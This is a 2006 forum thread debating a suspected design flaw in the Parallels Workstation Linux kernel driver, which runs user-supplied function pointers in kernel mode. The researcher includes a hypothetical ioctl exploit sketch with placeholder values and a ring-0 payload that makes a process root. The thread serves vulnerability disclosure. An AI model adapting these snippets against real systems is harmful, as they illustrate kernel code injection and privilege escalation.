Security & Design

Discussion in 'General Questions' started by jaaron, Jun 19, 2006.

  1. jaaron

    jaaron Bit poster

    Messages:
    2
    Several months ago, when Parallels Desktop for Mac was first covered on MacSlash, I posted a warning about the techniques used by Parallels in their Linux client.
    I had taken a cursory look at the code in the main driver module distributed with the Linux version of Parallels Workstation and was dismayed to find:

    Extracted from parallels-2.1.1670-lin/data/drivers/drv_main/ioctls.c

    <snip>
    if (copy_from_user(&mFunc, arg, sizeof(struct monitor_functions_def_t) * MONFUNC_COUNT))
            break;

    /* setup functions pointers */
    for (i = 0; i < MONFUNC_COUNT; i++)
            param->iData.MonitorFuncs[i] = (monitor_funct_t)mFunc[i].fId;

    /* initialize callbacks */
    vmSetExports(param);

    /* Monitor open */
    if (param->iData.MonitorFuncs[MONFUNC_OPEN]) {
            ret = param->iData.MonitorFuncs[MONFUNC_OPEN](&param->drvInfo, 0, param);
    }

    </snip>

    This is part of the ioctl() system call handler for a device created by the drv_main module installed by Parallels workstation.

    Basically, it copies some function pointers into the kernel from user space, installs them as event handlers (for what, I'm not entirely sure), then calls one of them while running in kernel mode! And it presumably calls the others at some point.
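    To make the concern concrete, here is a minimal sketch (written by me, not taken from the Parallels sources) of what a malicious local process could look like. Everything in it is an assumption for illustration: the device path, the ioctl request code, the struct layout, and MONFUNC_COUNT are hypothetical placeholders, and 0xdeadbeef stands in for the address of an attacker's payload.

    /* Hypothetical exploit sketch; the device path, request code, struct layout
     * and MONFUNC_COUNT are all guesses, not the real Parallels interface. */
    #include <fcntl.h>
    #include <stdio.h>
    #include <string.h>
    #include <sys/ioctl.h>
    #include <unistd.h>

    #define PARALLELS_DEV      "/dev/parallels"   /* hypothetical device node  */
    #define SET_MONFUNCS_IOCTL 0x1234             /* hypothetical request code */
    #define MONFUNC_COUNT      16                 /* guessed count             */

    struct monitor_functions_def_t {
        unsigned long fId;                        /* function pointer, per the snippet above */
    };

    int main(void)
    {
        struct monitor_functions_def_t mFunc[MONFUNC_COUNT];
        int fd = open(PARALLELS_DEV, O_RDWR);
        int i;

        if (fd < 0) {
            perror("open");
            return 1;
        }

        /* Point every "monitor function" at attacker-controlled code. */
        memset(mFunc, 0, sizeof(mFunc));
        for (i = 0; i < MONFUNC_COUNT; i++)
            mFunc[i].fId = 0xdeadbeef;

        /* The driver copies these pointers into kernel memory and then
         * calls MonitorFuncs[MONFUNC_OPEN] in ring 0. */
        if (ioctl(fd, SET_MONFUNCS_IOCTL, mFunc) < 0)
            perror("ioctl");

        close(fd);
        return 0;
    }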

    This means that any process able to make this ioctl() call on the device in question can introduce its own arbitrary code into your kernel, and it may not even require administrative privileges to do so. Code that is surreptitiously introduced into the kernel in this way is generally referred to as a rootkit.

    There is one protection against this: specifically, the caller must be able to produce a special "salt" (think of it as a really long password of random characters) that was generated when the module was loaded, though this is an optional protection that the user can easily turn off. But if someone figures out this salt (or it is disabled), they will have complete, unbridled access to literally everything on your computer (e.g., your bank account number as you type it into your online banking website), and they will be able to alter the way the operating system does things like interpret the filesystem (e.g., if they don't want you to see the file "Evil Hacker Toolbox of Doom", you won't, even if you're an administrator). Really, the ability to introduce arbitrary code into the most trusted component of a system is the ultimate subversion.
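    For what it's worth, here is a hypothetical sketch of what that salt check presumably amounts to inside the ioctl handler. This is my guess at the structure, not the actual Parallels code, and every name in it is made up; the point is simply that the entire protection reduces to one comparison that can be skipped if the user disables it.

    /* Hypothetical sketch of the salt protection described above (not real Parallels code). */
    #include <linux/string.h>

    #define SALT_LEN 64

    static unsigned char module_salt[SALT_LEN]; /* filled with random bytes at module load */
    static int salt_check_enabled = 1;          /* reportedly the user can turn this off   */

    static int check_salt(const unsigned char *caller_salt)
    {
            if (!salt_check_enabled)
                    return 1;                   /* protection disabled: any caller passes  */
            return memcmp(caller_salt, module_salt, SALT_LEN) == 0;
    }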

    Although I have only looked at part of their Linux version and none of their OS X version, my understanding of their design is that their "hypervisor" straddles the divide between your operating system's kernel space and its user space by passing function references from a userland process into their kernel modules. This design realizes none of the stability- or security-enhancing properties of a true hypervisor because it shares an execution context with the primary OS kernel (though it may retain the speed benefits), and I believe it to be inherently insecure because it provides an easily exploitable mechanism by which arbitrary code can be run in a highly trusted execution environment. This is why I do not trust Parallels Workstation/Desktop.

    Mac OS X has thus far been relatively resistant to threats. This is partly due to its relative obscurity, but it is also the result of a reasonable privilege model (I refuse to get sucked into the debate over which matters more; both are important). Long-time Mac users remember the days before OS X, when there was no hard separation between user space and kernel space; it was a dangerous time in which a single misbehaving application could wreak havoc across your whole platform. I don't want to go back to that time, but if I'm right about how Parallels' product works, that is exactly where they are taking us.

    If I am wrong in my interpretation of Parallels' design, I urge someone more familiar with the inner workings of the software to set me straight. Because Parallels' software is mostly closed source, I believe the only people likely to be qualified to correct me are engineers working for Parallels; however, anyone is welcome to try to dissuade me. I would also like to take this chance to urge Parallels to provide full source code for their product, so that others in the community can either verify my suspicions or disprove them (or perhaps confirm that the problems exist and correct them).

    -jaaron
     
  2. tgrogan

    tgrogan Pro

    Messages:
    255
    I have followed your previous discussions on this subject, and am having difficulty understanding its relevance to any real-world situation. I am particularly baffled by your projection from open source to OS X. If you can only construct a small possibility of a rootkit being installed on a system where the code is open, what is the possibility on a very closed system like OS X? There is a vast difference between the bad old days, when applications could misbehave and destroy operating systems and cause inconvenience, and the possibility of a rootkit being installed on an end-user machine by exploiting something as obscure as you describe, on the .0001% of all computers that happen to be running OS X or Linux and Parallels.

    I understand the need for near-perfect security in server-type applications, but projecting that detailed level of concern onto end-user computers is not justified. Most end-user intrusion problems will always be the fault of the user doing something ill-advised, and no built-in security will ever prevent that.

    Please give us some slow talk about the reality of what you are focused on. I think talk of stolen bank transactions is more than a little over the edge, considering what you said above it about how tedious the path to exploiting your conjectured breach would be.

    How about:
    1. Could any OS running in a Parallels VM use this vulnerability?
    2. What enablers would there have to be for this to be exploited?
    3. Have you been able to exploit this?
    4. Have you ever heard of a Mac or Linux distro-provided application that could install this specific rootkit?
    5. Is it bad code or just a necessary evil for doing virtualization?
    6. Are there many other software products that do this same thing?
     
    Last edited: Jun 19, 2006
  3. jaaron

    jaaron Bit poster

    Messages:
    2
    Response

    Yarg, I just typed up a really long response, but my session timed out. I will try to recapture it.

    You raise several good points. I will try to address what I feel they are.

    Yes, it is a leap, but I feel a reasonable one. I am basing my assertions on the belief that Parallels has attempted to maximize code reuse using code-isolation techniques. Specifically, I believe their kernel modules hold the bulk of the OS-specific code and present a consistent interface to the user-space applications. This way, the user-level code has to worry only about the underlying hardware (all x86), the management logic (OS independent), and the user interface (typically OS dependent, but very high level and fairly simple; on OS X it's mostly drag & drop).
    I have no real evidence for this, but it makes sense from a design perspective. My gripe is that I feel the interface exposed by their module opens the door to abuse.

    This is two points:
    1) Rootkits aren't as bad as no protected memory.
    2) It is unlikely that someone will be running Mac OS X + Parallels + Malicious Code

    With regards to point 1:
    That is true, but not as true as you think. Because OS X (like Linux and Windows) uses a monolithic kernel (in the sense that the entire kernel operates in a single address space), malicious code running inside your kernel has full access to every single bit of memory and every I/O port on the system. I noticed from your later comment about bank statements that you must have read my LiveJournal post on the subject, so I will not go into great detail on the ring architecture.
    The thing to recall is that anything running in ring 0 (kernel space) can do whatever it wants; the standard Unix permissions and access controls do not apply to kernel code.
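    To illustrate why the usual access controls offer no help here, the following is the kind of payload (era-appropriate for the 2.6 kernels of the time; newer kernels use commit_creds() instead) that arbitrary code running in ring 0 could execute. This is an illustration written by me, not anything from Parallels; the point is simply that the kernel is the code enforcing the permission checks, so code inside the kernel can rewrite the answers.

    /* Illustrative ring-0 payload, 2.6-era style: silently make the calling
     * process root.  No permission check stands in the way, because this code
     * runs as part of the code that performs the permission checks. */
    #include <linux/sched.h>                    /* for current / task_struct */

    static void become_root(void)
    {
            current->uid = current->euid = 0;
            current->gid = current->egid = 0;
    }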

    With regards to point 2:
    Also true, but I would say it is not an excuse. We (consumers) should not tolerate poor security engineering in software. We have put up with it for far too long, and it has gotten us into no end of trouble. I could throw out all sorts of metaphors here about how I like locks on the doors of my home even though it is unlikely I will be robbed, but I'll spare you that refrain.

    My point is that security vulnerabilities, even ones that are unlikely to be exploited, hurt the consumer because they reinforce the message that software developers don't need to worry about preventing them. The only way to mitigate this problem is to expose the vulnerabilities so that individuals can do their own risk analysis and decide whether they are willing to accept the risk involved in running a particular piece of insecure software. In my ideal world, enough people would be unwilling to accept this risk that developers would be forced to fix the vulnerabilities, but I recognize that as a fantasy. I feel that as an informed citizen of the community (I work as a security researcher), I owe it to the community to do something about my findings, either by posting publicly or by disclosing to the developer privately. I chose to post publicly (for no particularly good reason other than that it's what I felt like doing).

    See above.

    Another good point. I was using a bit of hyperbole there; I admit it, I was fear-mongering. I do not think it is likely that people's bank account information will be stolen through this method. There are much easier ways to do that (the best being to simply ask for it; you'd be surprised how often that works). I made that comment to provide a concrete example of what bad things could be done if this were exploited, and I felt that stolen bank account numbers were easier for a less technical audience to grasp than "arbitrary code running in ring 0" or any other technical gobbledygook I might spit out. I also attempted to make it clear that this is a nontrivial thing to exploit. Obviously a risk analysis of the software involves weighing the likelihood of an exploit against its cost; for most users the likelihood is phenomenally low and the potential cost is fairly low as well, so the risk may be low enough that many people will still choose to use the product. At least they will have made an informed decision.

    Also, I would like to baselessly point out that, to me, this sort of vulnerability is indicative of an engineering process that does not put sufficient emphasis on security. That suggests other vulnerabilities are likely lurking beneath my surface-deep examination. Believe me, there is a community of malicious hackers who are phenomenally clever and devoted to finding new and exciting ways to exploit software products. My cursory examination is nothing compared to the level of detail at which they would study this product if it were to rise to prominence.

    1) I do not believe so. This is a (potential) vulnerability introduced into the host operating system, not the guest.
    2) The Parallels kernel module must be loaded (presumably done at boot time), and if the salt is enabled the exploit code must determine it; other than that, nothing. I do not believe it would even require admin privileges (unless the Parallels userland app requires admin privileges, and that would be a whole 'nother kettle of fish).
    3) No. I haven't even really succeeded in running Parallels; I do not have access to an Intel Mac, and when I tried to run the software on Linux I had some problems with module versioning. Beyond that, I have not really tried.
    4) I'm not entirely sure what you mean by this. The Parallels product itself is not a rootkit (although some may disagree); it merely (I think) opens up a new avenue by which other code may install one.
    5) I don't think so. I looked at VMware's Linux kernel modules, and they do not seem to import function pointers from userland into kernel space.
    6) I have not seen any.


    I hope this has clearly and sufficiently addressed your concerns.
     
